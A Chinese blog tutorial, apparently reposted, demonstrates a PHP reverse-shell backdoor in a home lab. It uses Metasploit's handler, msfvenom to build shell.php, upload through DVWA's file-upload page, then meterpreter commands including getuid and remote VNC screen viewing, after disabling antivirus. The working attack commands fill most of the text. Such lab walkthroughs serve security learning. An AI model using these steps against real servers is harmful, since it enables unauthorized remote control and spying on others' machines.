PHP后门反弹演示
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP后门反弹演示相关的知识,希望对你有一定的参考价值。
准备
- 一台kali虚拟机
- 一台 win11物理机
注意:
需要将杀毒软件个关了, 否则有提示, 黑客入侵.
开始
使用监控模块, 输入:
use exploit/multi/handler
配置payload
set payload php/meterpreter/reverse_tcp
# 接着输入
options
设置 lhost 和lport
这里发现 攻击机的端口不用设置了, 已经有了, 只要设置lhost 就可以了
set lhost 攻击机的ip
生成php后门执行攻击获得meterpreter
注意: 要新建端口, 在root权限下执行
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip lport=4444 R>shell.php
这样在window11左面少就有这个文件了
上传文件
这是我原来的地址: http://dvwa/vulnerabilities/upload/#
这是我要填写的地址: http://dvwa/hackable/uploads/shell.php
出现上图几面说明: 这是正常的, 后门已经上传到了靶机上
获得权限
- 输入:
run
# 也可以直接输入 exploit , 都一样
也可能出现 404, 都是正常现象
只要有这两行, 就代表上传的后门生效了
成功啦
- 获取管理员的名字, 输入:
getuid
- 观看屏幕 可以在meterpreter里输入
run vnc
点开文件即可看到自己电脑的画面
以上是关于PHP后门反弹演示的主要内容,如果未能解决你的问题,请参考以下文章